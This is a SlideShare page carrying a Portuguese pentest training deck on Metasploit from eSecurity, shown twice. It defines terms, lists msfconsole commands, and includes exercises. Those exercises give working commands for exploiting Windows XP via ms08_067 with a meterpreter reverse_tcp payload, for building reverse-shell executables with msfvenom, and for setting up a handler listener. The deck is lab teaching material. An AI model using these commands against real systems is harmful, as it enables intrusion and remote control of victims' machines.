SlideShare uma empresa Scribd logo
1 de 15
Baixar para ler offline
O que temos pra hoje?
Temas de Hoje:
• Metasploit
• Definição
• Versões
• MSFCONSOLE
• Exercício: Atacando Windows XP através do console
• MSFVENOM
• Exercício: Atacando Windows XP através do MSFVENOM
• Realizando ataques externos
www.eSecurity.com.br
Metasploit
www.eSecurity.com.br
O projeto Metasploit foi criado em 2003 por HD Moore e é uma plataforma que
permite a verificação do estado da segurança dos computadores existentes numa
determinada rede, permitindo atacar as falhas de segurança existentes nos mais
diversos softwares.
Este é o melhor conjunto de ferramentas para exploração, sendo atualizadas
diariamente com as mais recentes falhas de segurança identificadas por
profissionais no ramo.
Esta “framework” open source, está em constante transformação, é programada em
Ruby e está organizada em diversos módulos.
São estes módulos que contêm os programas preparados especificamente para
tirarem partido de vulnerabilidades encontradas nos softwares e sistemas
operacionais, permitindo assim a execução de código malicioso e
consequentemente a invasão da máquina.
www.eSecurity.com.br
Metasploit: Definição
www.eSecurity.com.br
Metasploit: Definição
www.eSecurity.com.br
•Exploit
É um meio pelo qual um atacante consegue explorar uma falha dentro de um
Sistema
•Payload
Um código embutido em um exploit utilizado para definição de pós exploração.
É a ação que será executada pós exploração
•Shellcode
É o código do Payload que é injetado no sistema comprometido através do
exploit.
•Module
Pequenos pedaços de scripts que podem ser utilizados pelo metasploit para
realizar determinadas operações
•Listener
Componente que aguarda uma conexão de retorno pós invasão. Útil para
conexão reversa
Metasploit: Definição
www.eSecurity.com.br
Metasploit: Versões
Metasploit Express
Teste de Intrusão por linha de comando
Geralmente utilizado em pequenas e médias empresas
$ 5,000
Metasploit PRO
Versão do Metasploit Profissional, Pago!
Aproximadamente $ 11,000
Metasploit Community Edition
Versão gratuita do Metasploit Pro
$ 0,00
Armitage
Uma interface grafica que não foi criada pelos criadores do Metasploit
MSFConsole:
Console do metasploit para facilitação de ataques
Sintaxe:
msfconsole
Opções Básicas:
? – Apresenta o menu de ajuda
Back – Volta um nível
Banner – Apresenta o Banner do Metasploit
Cd – Altera o diretório corrente do Metasploit
Color - Altera a cor do metasploit
Connect – Conecta com outro Host
Edit – Edita o módulo corrente
Exit – Sair do console
Go_pro – Inicia o Metasploit em tela gráfica
Grep – Filtra a saída do comando
www.eSecurity.com.br
Metasploit: MSFCONSOLE
Opções Básicas:
Help – Apresenta o menu de ajuda
Info – Apresenta informações sobre um ou mais módulos
Irb – Interpretador de comando Ruby
Jobs – Visualização e gerenciamento de tarefas
Kill – Eliminador de tarefas
Load – Carregador de Framework Plugin
LoadPath – Adicionar caminhos aos módulos
Makerc – Salvar comandos executados desde a inicialização para o arquivo
especificado
Popm – Apresenta o último módulo fora da pilha e o ativa, sem alterar o módulo em
execução
Previous – Define o módulo carregado anteriormente como o módulo atual
Pushm – Empurra os módulos ativos para a pilha
Quit – Sair do console
Reload_all – Recarrega todos os módulos
Resource – Carrega os comandos armazenados em um arquivo
Route – Rotear o tráfego através de uma sessão
www.eSecurity.com.br
Metasploit: MSFCONSOLE
Opções Básicas:
Save – Armazena os dados ativos
Search – Procura módulos por nomes e/ou descrições
Sessions – Alterna entre sessões
Set – Seta um valor à uma variável
Setg – Seta um valor à uma variável global
Show – Apresenta módulos de um determinado tipo ou todos os módulos
Sleep – Não faz para durante um número especificado de segundos
Spool – Apresenta no console o conteúdo de um arquivo
Threads – Multiplica o número de requisições/ataques
Unload – Descarregar um framework plugin
Unset – Limpar dados de variáveis
Unsetg – Limpar dados de variáveis globais
Use – Seleciona um módulo pelo nome
Version – Apresenta as versões do framework e o número de bibliotecas
www.eSecurity.com.br
Metasploit: MSFCONSOLE
Atacando o Windows XP através do Console
• Acessando o console
• msfconsole
• Selecionando o exploit
• use windows/smb/ms08_067_netapi
• Selecionando o Payload
• set PAYLOAD windows/meterpreter/reverse_tcp
• Setando o IP do alvo (Remote Host)
• set RHOST 192.168.2.104
• Setando o IP do atacante (Local Host)
• set LHOST 192.168.2.103
• Realizando o ataque
• exploit
www.eSecurity.com.br
Metasploit: Atacando WINXP
MSFPayload:
É a junção de 2 ferramentas descontinuadas chamadas MSFPAYLOAD e
MSFenconde e é utilizada para agilizar o trabalho do console.
Sintaxe:
Traz as opções do payload selecionado
msfvenom -l windows/shell_reverse_tcp O
Exemplo de uso:
Apresenta a lista de payloads existentes, você também pode procurar por encoders,
nops ou all
msfvenom -l payload
Cria um arquivo exe onde ao ser executado irá efetuar uma conexão reversa.
Msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 -f exe -o arquivo.exe
www.eSecurity.com.br
Metasploit: MSFPAYLOAD
Exemplo de uso:
Cria um arquivo exe onde ao ser executado irá efetuar uma conexão reversa.
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.1.10 -f exe > arquivo.exe
Criando uma conexão reversa:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
www.eSecurity.com.br
Metasploit: Atacando WINXP
Realizando ataques externos:
www.eSecurity.com.br
Metasploit: Realizando ataque externo
192.168.0.3 192.168.0.1 201.98.56.14 189.76.15.67
IP FORWARD
E-mail: alan.sanches@esecurity.com.br
Twitter: @esecuritybr e @desafiohacker
Skype: desafiohacker
Fanpage: www.facebook.com/academiahacker
printf ("Chega por hojen");
www.eSecurity.com.br
www.eSecurity.com.br

Mais conteúdo relacionado

Semelhante a Metasploit-1_atualizacao.pdf

O Projeto Mono: Aplicações .NET para sistemas não Windows
O Projeto Mono: Aplicações .NET para sistemas não WindowsO Projeto Mono: Aplicações .NET para sistemas não Windows
O Projeto Mono: Aplicações .NET para sistemas não WindowsAlessandro Binhara
 
Introdução ao Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilli...
Introdução ao Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilli...Introdução ao Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilli...
Introdução ao Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilli...Tchelinux
 
Interop itcare: Interoperabilidade Java e .NET
Interop itcare: Interoperabilidade Java e .NETInterop itcare: Interoperabilidade Java e .NET
Interop itcare: Interoperabilidade Java e .NETAlessandro Binhara
 
Trabalho So Fernanda
Trabalho So FernandaTrabalho So Fernanda
Trabalho So Fernandaf2008
 
Curso de sistemas operacionais
Curso de sistemas operacionaisCurso de sistemas operacionais
Curso de sistemas operacionaisKassen Azanki
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Roberto Soares
 
Inter Aula1
Inter  Aula1Inter  Aula1
Inter Aula1willians
 
Mini-curso de linux básico
Mini-curso de linux básicoMini-curso de linux básico
Mini-curso de linux básicoAdriano Melo
 
Poo1 aula 1 - java - história e introdução
Poo1   aula 1 - java -  história e introduçãoPoo1   aula 1 - java -  história e introdução
Poo1 aula 1 - java - história e introduçãoDenis Sobrenome
 
Poo1 aula 1 - java - história e introdução
Poo1   aula 1 - java -  história e introduçãoPoo1   aula 1 - java -  história e introdução
Poo1 aula 1 - java - história e introduçãoDenis Sobrenome
 
Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilling Landgraf
Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilling LandgrafDesenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilling Landgraf
Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilling LandgrafTchelinux
 
Sistemas operacionais
Sistemas operacionaisSistemas operacionais
Sistemas operacionaisvini_campos
 
ApresentaçãO2 Sistema Operacional
ApresentaçãO2  Sistema OperacionalApresentaçãO2  Sistema Operacional
ApresentaçãO2 Sistema OperacionalCláudia Costa
 
EvoluçãO Do Sistema Operativo
EvoluçãO Do Sistema OperativoEvoluçãO Do Sistema Operativo
EvoluçãO Do Sistema Operativoguest2784db
 

Semelhante a Metasploit-1_atualizacao.pdf (20)

O Projeto Mono: Aplicações .NET para sistemas não Windows
O Projeto Mono: Aplicações .NET para sistemas não WindowsO Projeto Mono: Aplicações .NET para sistemas não Windows
O Projeto Mono: Aplicações .NET para sistemas não Windows
 
Int305 projeto mono-final
Int305 projeto mono-finalInt305 projeto mono-final
Int305 projeto mono-final
 
Cygwin
CygwinCygwin
Cygwin
 
Introdução ao Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilli...
Introdução ao Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilli...Introdução ao Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilli...
Introdução ao Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilli...
 
Interop itcare: Interoperabilidade Java e .NET
Interop itcare: Interoperabilidade Java e .NETInterop itcare: Interoperabilidade Java e .NET
Interop itcare: Interoperabilidade Java e .NET
 
Trabalho So Fernanda
Trabalho So FernandaTrabalho So Fernanda
Trabalho So Fernanda
 
Curso de sistemas operacionais
Curso de sistemas operacionaisCurso de sistemas operacionais
Curso de sistemas operacionais
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"
 
1309 apostila windows_xp
1309 apostila windows_xp1309 apostila windows_xp
1309 apostila windows_xp
 
TotalCross Mini Curso
TotalCross Mini Curso TotalCross Mini Curso
TotalCross Mini Curso
 
Inter Aula1
Inter  Aula1Inter  Aula1
Inter Aula1
 
Mini-curso de linux básico
Mini-curso de linux básicoMini-curso de linux básico
Mini-curso de linux básico
 
Poo1 aula 1 - java - história e introdução
Poo1   aula 1 - java -  história e introduçãoPoo1   aula 1 - java -  história e introdução
Poo1 aula 1 - java - história e introdução
 
Poo1 aula 1 - java - história e introdução
Poo1   aula 1 - java -  história e introduçãoPoo1   aula 1 - java -  história e introdução
Poo1 aula 1 - java - história e introdução
 
Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilling Landgraf
Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilling LandgrafDesenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilling Landgraf
Desenvolvimento do Kernel Linux Versões 2.6.X - Douglas Schilling Landgraf
 
Minicurso Linux
Minicurso Linux Minicurso Linux
Minicurso Linux
 
Sistemas operacionais
Sistemas operacionaisSistemas operacionais
Sistemas operacionais
 
Apostila de-vb-net
Apostila de-vb-netApostila de-vb-net
Apostila de-vb-net
 
ApresentaçãO2 Sistema Operacional
ApresentaçãO2  Sistema OperacionalApresentaçãO2  Sistema Operacional
ApresentaçãO2 Sistema Operacional
 
EvoluçãO Do Sistema Operativo
EvoluçãO Do Sistema OperativoEvoluçãO Do Sistema Operativo
EvoluçãO Do Sistema Operativo
 

Metasploit-1_atualizacao.pdf

  • 1.
  • 2. O que temos pra hoje? Temas de Hoje: • Metasploit • Definição • Versões • MSFCONSOLE • Exercício: Atacando Windows XP através do console • MSFVENOM • Exercício: Atacando Windows XP através do MSFVENOM • Realizando ataques externos www.eSecurity.com.br
  • 4. O projeto Metasploit foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo atacar as falhas de segurança existentes nos mais diversos softwares. Este é o melhor conjunto de ferramentas para exploração, sendo atualizadas diariamente com as mais recentes falhas de segurança identificadas por profissionais no ramo. Esta “framework” open source, está em constante transformação, é programada em Ruby e está organizada em diversos módulos. São estes módulos que contêm os programas preparados especificamente para tirarem partido de vulnerabilidades encontradas nos softwares e sistemas operacionais, permitindo assim a execução de código malicioso e consequentemente a invasão da máquina. www.eSecurity.com.br Metasploit: Definição
  • 6. www.eSecurity.com.br •Exploit É um meio pelo qual um atacante consegue explorar uma falha dentro de um Sistema •Payload Um código embutido em um exploit utilizado para definição de pós exploração. É a ação que será executada pós exploração •Shellcode É o código do Payload que é injetado no sistema comprometido através do exploit. •Module Pequenos pedaços de scripts que podem ser utilizados pelo metasploit para realizar determinadas operações •Listener Componente que aguarda uma conexão de retorno pós invasão. Útil para conexão reversa Metasploit: Definição
  • 7. www.eSecurity.com.br Metasploit: Versões Metasploit Express Teste de Intrusão por linha de comando Geralmente utilizado em pequenas e médias empresas $ 5,000 Metasploit PRO Versão do Metasploit Profissional, Pago! Aproximadamente $ 11,000 Metasploit Community Edition Versão gratuita do Metasploit Pro $ 0,00 Armitage Uma interface grafica que não foi criada pelos criadores do Metasploit
  • 8. MSFConsole: Console do metasploit para facilitação de ataques Sintaxe: msfconsole Opções Básicas: ? – Apresenta o menu de ajuda Back – Volta um nível Banner – Apresenta o Banner do Metasploit Cd – Altera o diretório corrente do Metasploit Color - Altera a cor do metasploit Connect – Conecta com outro Host Edit – Edita o módulo corrente Exit – Sair do console Go_pro – Inicia o Metasploit em tela gráfica Grep – Filtra a saída do comando www.eSecurity.com.br Metasploit: MSFCONSOLE
  • 9. Opções Básicas: Help – Apresenta o menu de ajuda Info – Apresenta informações sobre um ou mais módulos Irb – Interpretador de comando Ruby Jobs – Visualização e gerenciamento de tarefas Kill – Eliminador de tarefas Load – Carregador de Framework Plugin LoadPath – Adicionar caminhos aos módulos Makerc – Salvar comandos executados desde a inicialização para o arquivo especificado Popm – Apresenta o último módulo fora da pilha e o ativa, sem alterar o módulo em execução Previous – Define o módulo carregado anteriormente como o módulo atual Pushm – Empurra os módulos ativos para a pilha Quit – Sair do console Reload_all – Recarrega todos os módulos Resource – Carrega os comandos armazenados em um arquivo Route – Rotear o tráfego através de uma sessão www.eSecurity.com.br Metasploit: MSFCONSOLE
  • 10. Opções Básicas: Save – Armazena os dados ativos Search – Procura módulos por nomes e/ou descrições Sessions – Alterna entre sessões Set – Seta um valor à uma variável Setg – Seta um valor à uma variável global Show – Apresenta módulos de um determinado tipo ou todos os módulos Sleep – Não faz para durante um número especificado de segundos Spool – Apresenta no console o conteúdo de um arquivo Threads – Multiplica o número de requisições/ataques Unload – Descarregar um framework plugin Unset – Limpar dados de variáveis Unsetg – Limpar dados de variáveis globais Use – Seleciona um módulo pelo nome Version – Apresenta as versões do framework e o número de bibliotecas www.eSecurity.com.br Metasploit: MSFCONSOLE
  • 11. Atacando o Windows XP através do Console • Acessando o console • msfconsole • Selecionando o exploit • use windows/smb/ms08_067_netapi • Selecionando o Payload • set PAYLOAD windows/meterpreter/reverse_tcp • Setando o IP do alvo (Remote Host) • set RHOST 192.168.2.104 • Setando o IP do atacante (Local Host) • set LHOST 192.168.2.103 • Realizando o ataque • exploit www.eSecurity.com.br Metasploit: Atacando WINXP
  • 12. MSFPayload: É a junção de 2 ferramentas descontinuadas chamadas MSFPAYLOAD e MSFenconde e é utilizada para agilizar o trabalho do console. Sintaxe: Traz as opções do payload selecionado msfvenom -l windows/shell_reverse_tcp O Exemplo de uso: Apresenta a lista de payloads existentes, você também pode procurar por encoders, nops ou all msfvenom -l payload Cria um arquivo exe onde ao ser executado irá efetuar uma conexão reversa. Msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 -f exe -o arquivo.exe www.eSecurity.com.br Metasploit: MSFPAYLOAD
  • 13. Exemplo de uso: Cria um arquivo exe onde ao ser executado irá efetuar uma conexão reversa. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 -f exe > arquivo.exe Criando uma conexão reversa: msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost IP exploit www.eSecurity.com.br Metasploit: Atacando WINXP
  • 14. Realizando ataques externos: www.eSecurity.com.br Metasploit: Realizando ataque externo 192.168.0.3 192.168.0.1 201.98.56.14 189.76.15.67 IP FORWARD
  • 15. E-mail: alan.sanches@esecurity.com.br Twitter: @esecuritybr e @desafiohacker Skype: desafiohacker Fanpage: www.facebook.com/academiahacker printf ("Chega por hojen"); www.eSecurity.com.br www.eSecurity.com.br